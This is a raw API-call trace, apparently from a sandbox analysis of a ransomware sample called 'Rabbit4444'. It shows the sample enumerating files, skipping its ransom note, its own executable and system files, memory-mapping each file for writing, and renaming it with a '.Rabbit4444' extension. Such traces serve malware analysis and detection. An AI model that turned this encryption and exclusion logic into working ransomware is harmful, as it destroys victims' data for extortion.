[0067.996] lstrcmpiW (lpString1="582}", lpString2=".ini") returned 1 [0067.996] lstrlenW (lpString=".sys") returned 4 [0067.996] lstrcmpiW (lpString1="582}", lpString2=".sys") returned 1 [0067.996] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{754cb5b5-fc11-468d-8a43-afe0c8cf4582}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.996] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.996] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15930674005) returned 1 [0067.996] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.996] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0067.996] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0067.996] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.997] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.998] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.998] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.998] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.998] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0067.998] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0067.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.999] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15930950737) returned 1 [0067.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0067.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0067.999] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.999] CloseHandle (hObject=0x29c) returned 1 [0067.999] CloseHandle (hObject=0x280) returned 1 [0067.999] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}.Rabbit4444") returned 156 [0067.999] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{754cb5b5-fc11-468d-8a43-afe0c8cf4582}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{754CB5B5-FC11-468D-8A43-AFE0C8CF4582}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{754cb5b5-fc11-468d-8a43-afe0c8cf4582}.rabbit4444"), dwFlags=0x1) returned 1 [0068.000] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9927cac9, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9927cac9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42e363fa, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", cAlternateFileName="{77C47~1")) returned 1 [0068.000] lstrcmpiW (lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.000] lstrcmpiW (lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.000] lstrcmpiW (lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", lpString2="Rabbit4444.exe") returned -1 [0068.000] lstrcmpiW (lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", lpString2=".") returned 1 [0068.000] lstrcmpiW (lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", lpString2="..") returned 1 [0068.000] lstrcmpiW (lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", lpString2="windows") returned -1 [0068.000] lstrcmpiW (lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", lpString2="bootmgr") returned -1 [0068.000] lstrcmpiW (lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", lpString2="pagefile.sys") returned -1 [0068.000] lstrcmpiW (lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", lpString2="boot") returned -1 [0068.000] lstrcmpiW (lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", lpString2="ids.txt") returned -1 [0068.000] lstrcmpiW (lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", lpString2="NTUSER.DAT") returned -1 [0068.000] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}" | out: lpString1="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}") returned="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}" [0068.000] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{77C47392-01FD-4E37-8CD4-29EA6C090EC5}", dwFileAttributes=0x0) returned 1 [0068.001] lstrlenW (lpString="{77C47392-01FD-4E37-8CD4-29EA6C090EC5}") returned 38 [0068.001] lstrlenW (lpString="Rabbit4444") returned 10 [0068.001] lstrcmpiW (lpString1="A6C090EC5}", lpString2="Rabbit4444") returned -1 [0068.001] lstrlenW (lpString=".dll") returned 4 [0068.001] lstrcmpiW (lpString1="EC5}", lpString2=".dll") returned 1 [0068.001] lstrlenW (lpString=".lnk") returned 4 [0068.001] lstrcmpiW (lpString1="EC5}", lpString2=".lnk") returned 1 [0068.001] lstrlenW (lpString=".ini") returned 4 [0068.001] lstrcmpiW (lpString1="EC5}", lpString2=".ini") returned 1 [0068.001] lstrlenW (lpString=".sys") returned 4 [0068.001] lstrcmpiW (lpString1="EC5}", lpString2=".sys") returned 1 [0068.001] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{77C47392-01FD-4E37-8CD4-29EA6C090EC5}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{77c47392-01fd-4e37-8cd4-29ea6c090ec5}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.001] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.001] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15931206557) returned 1 [0068.001] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0068.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0068.002] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.015] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0068.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0068.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0068.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0068.017] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15932727786) returned 1 [0068.017] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0068.017] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0068.017] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.017] CloseHandle (hObject=0x29c) returned 1 [0068.017] CloseHandle (hObject=0x280) returned 1 [0068.017] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{77C47392-01FD-4E37-8CD4-29EA6C090EC5}.Rabbit4444") returned 156 [0068.017] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{77C47392-01FD-4E37-8CD4-29EA6C090EC5}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{77c47392-01fd-4e37-8cd4-29ea6c090ec5}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{77C47392-01FD-4E37-8CD4-29EA6C090EC5}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{77c47392-01fd-4e37-8cd4-29ea6c090ec5}.rabbit4444"), dwFlags=0x1) returned 1 [0068.018] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x992a2d25, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x992a2d25, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42e5c5fd, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", cAlternateFileName="{77CE3~1")) returned 1 [0068.018] lstrcmpiW (lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.018] lstrcmpiW (lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.018] lstrcmpiW (lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", lpString2="Rabbit4444.exe") returned -1 [0068.018] lstrcmpiW (lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", lpString2=".") returned 1 [0068.018] lstrcmpiW (lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", lpString2="..") returned 1 [0068.018] lstrcmpiW (lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", lpString2="windows") returned -1 [0068.018] lstrcmpiW (lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", lpString2="bootmgr") returned -1 [0068.018] lstrcmpiW (lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", lpString2="pagefile.sys") returned -1 [0068.018] lstrcmpiW (lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", lpString2="boot") returned -1 [0068.018] lstrcmpiW (lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", lpString2="ids.txt") returned -1 [0068.018] lstrcmpiW (lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", lpString2="NTUSER.DAT") returned -1 [0068.018] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}" | out: lpString1="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}") returned="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}" [0068.018] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{77CE3801-C60A-4FC0-83AD-607CBE802B4C}", dwFileAttributes=0x0) returned 1 [0068.019] lstrlenW (lpString="{77CE3801-C60A-4FC0-83AD-607CBE802B4C}") returned 38 [0068.019] lstrlenW (lpString="Rabbit4444") returned 10 [0068.019] lstrcmpiW (lpString1="CBE802B4C}", lpString2="Rabbit4444") returned -1 [0068.019] lstrlenW (lpString=".dll") returned 4 [0068.019] lstrcmpiW (lpString1="B4C}", lpString2=".dll") returned 1 [0068.019] lstrlenW (lpString=".lnk") returned 4 [0068.019] lstrcmpiW (lpString1="B4C}", lpString2=".lnk") returned 1 [0068.019] lstrlenW (lpString=".ini") returned 4 [0068.019] lstrcmpiW (lpString1="B4C}", lpString2=".ini") returned 1 [0068.019] lstrlenW (lpString=".sys") returned 4 [0068.019] lstrcmpiW (lpString1="B4C}", lpString2=".sys") returned 1 [0068.019] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{77CE3801-C60A-4FC0-83AD-607CBE802B4C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{77ce3801-c60a-4fc0-83ad-607cbe802b4c}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.020] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.020] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15933031821) returned 1 [0068.020] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.020] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0068.020] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0068.020] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.021] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0068.022] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.022] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.022] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.022] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.022] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0068.022] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15933293591) returned 1 [0068.022] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0068.022] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0068.022] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.022] CloseHandle (hObject=0x29c) returned 1 [0068.022] CloseHandle (hObject=0x280) returned 1 [0068.023] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{77CE3801-C60A-4FC0-83AD-607CBE802B4C}.Rabbit4444") returned 156 [0068.023] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{77CE3801-C60A-4FC0-83AD-607CBE802B4C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{77ce3801-c60a-4fc0-83ad-607cbe802b4c}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{77CE3801-C60A-4FC0-83AD-607CBE802B4C}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{77ce3801-c60a-4fc0-83ad-607cbe802b4c}.rabbit4444"), dwFlags=0x1) returned 1 [0068.023] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x992a2d25, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x992a2d25, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42e5c5fd, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", cAlternateFileName="{78921~1")) returned 1 [0068.023] lstrcmpiW (lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.023] lstrcmpiW (lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.023] lstrcmpiW (lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", lpString2="Rabbit4444.exe") returned -1 [0068.023] lstrcmpiW (lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", lpString2=".") returned 1 [0068.023] lstrcmpiW (lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", lpString2="..") returned 1 [0068.024] lstrcmpiW (lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", lpString2="windows") returned -1 [0068.024] lstrcmpiW (lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", lpString2="bootmgr") returned -1 [0068.024] lstrcmpiW (lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", lpString2="pagefile.sys") returned -1 [0068.024] lstrcmpiW (lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", lpString2="boot") returned -1 [0068.024] lstrcmpiW (lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", lpString2="ids.txt") returned -1 [0068.024] lstrcmpiW (lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", lpString2="NTUSER.DAT") returned -1 [0068.024] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}" | out: lpString1="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}") returned="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}" [0068.024] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{789219FF-53B5-44A2-8477-EF2C6EBA1B43}", dwFileAttributes=0x0) returned 1 [0068.024] lstrlenW (lpString="{789219FF-53B5-44A2-8477-EF2C6EBA1B43}") returned 38 [0068.024] lstrlenW (lpString="Rabbit4444") returned 10 [0068.024] lstrcmpiW (lpString1="C6EBA1B43}", lpString2="Rabbit4444") returned -1 [0068.024] lstrlenW (lpString=".dll") returned 4 [0068.024] lstrcmpiW (lpString1="B43}", lpString2=".dll") returned 1 [0068.024] lstrlenW (lpString=".lnk") returned 4 [0068.024] lstrcmpiW (lpString1="B43}", lpString2=".lnk") returned 1 [0068.024] lstrlenW (lpString=".ini") returned 4 [0068.024] lstrcmpiW (lpString1="B43}", lpString2=".ini") returned 1 [0068.024] lstrlenW (lpString=".sys") returned 4 [0068.024] lstrcmpiW (lpString1="B43}", lpString2=".sys") returned 1 [0068.024] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{789219FF-53B5-44A2-8477-EF2C6EBA1B43}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{789219ff-53b5-44a2-8477-ef2c6eba1b43}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.025] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.025] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15933540317) returned 1 [0068.025] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.025] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0068.025] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0068.025] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.026] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.027] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0068.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.027] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0068.027] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.027] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.027] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15933820448) returned 1 [0068.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0068.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0068.028] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.028] CloseHandle (hObject=0x29c) returned 1 [0068.028] CloseHandle (hObject=0x280) returned 1 [0068.028] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{789219FF-53B5-44A2-8477-EF2C6EBA1B43}.Rabbit4444") returned 156 [0068.028] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{789219FF-53B5-44A2-8477-EF2C6EBA1B43}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{789219ff-53b5-44a2-8477-ef2c6eba1b43}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{789219FF-53B5-44A2-8477-EF2C6EBA1B43}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{789219ff-53b5-44a2-8477-ef2c6eba1b43}.rabbit4444"), dwFlags=0x1) returned 1 [0068.029] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x995c3e9b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x995c3e9b, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x442528d2, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", cAlternateFileName="{7939D~1")) returned 1 [0068.029] lstrcmpiW (lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.029] lstrcmpiW (lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.029] lstrcmpiW (lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", lpString2="Rabbit4444.exe") returned -1 [0068.029] lstrcmpiW (lpString1="{7939D66A-9DE8-40A2-95E5-950A8ABC8F59}", lpString2=".") returned 1 [0068.029] 